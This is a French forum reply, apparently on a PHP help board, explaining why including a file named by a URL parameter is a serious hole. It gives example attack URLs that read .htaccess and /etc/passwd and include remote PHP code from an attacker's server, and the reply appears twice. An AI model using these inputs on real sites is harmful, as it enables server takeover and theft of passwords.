A voir également:
- Securité avec INCLUDE
- #Include <windows.h> ✓ - Forum C++ & C++ .NET
- .Include c# - Forum ASP / ASP.NET
- Fonctions dispo avec windows.h ✓ - Forum C
- Php include class - Forum PHP
- Php include path ✓ - Forum PHP
2 réponses
Bah oui ça fait un GROS trou :)
Imagines par exemple que tu protèges un de test répertoires via un fichier .htaccess
Une personne mal intentionnée pourrait tout simplement appeller la page "mapage.php?url=repprotege/.htaccess" pour l'obtenir.
Après lecture de ce fichier il peut obtenir les mots de passe que tu as défini pour le répertoire.
Encore un autre méchant exemple, le type dispose d'un serveur Web et fait simplement "mapage.php?url=http://sonsite.dom/unscript.txt" avec du code PHP dans le fichier texte... à se moment là il peut executer n'importe quel code sur ton serveur et peut par exemple effacer tout ton site si ça lui chante.
Autre exemple (mais la j'ai un doute sur la possibilité, ça dépend des droits d'Apache et/ou des restrictions appliquées au PHP) sous Unix/Linux : "mapage.php?url=/etc/passwd"
Imagines par exemple que tu protèges un de test répertoires via un fichier .htaccess
Une personne mal intentionnée pourrait tout simplement appeller la page "mapage.php?url=repprotege/.htaccess" pour l'obtenir.
Après lecture de ce fichier il peut obtenir les mots de passe que tu as défini pour le répertoire.
Encore un autre méchant exemple, le type dispose d'un serveur Web et fait simplement "mapage.php?url=http://sonsite.dom/unscript.txt" avec du code PHP dans le fichier texte... à se moment là il peut executer n'importe quel code sur ton serveur et peut par exemple effacer tout ton site si ça lui chante.
Autre exemple (mais la j'ai un doute sur la possibilité, ça dépend des droits d'Apache et/ou des restrictions appliquées au PHP) sous Unix/Linux : "mapage.php?url=/etc/passwd"
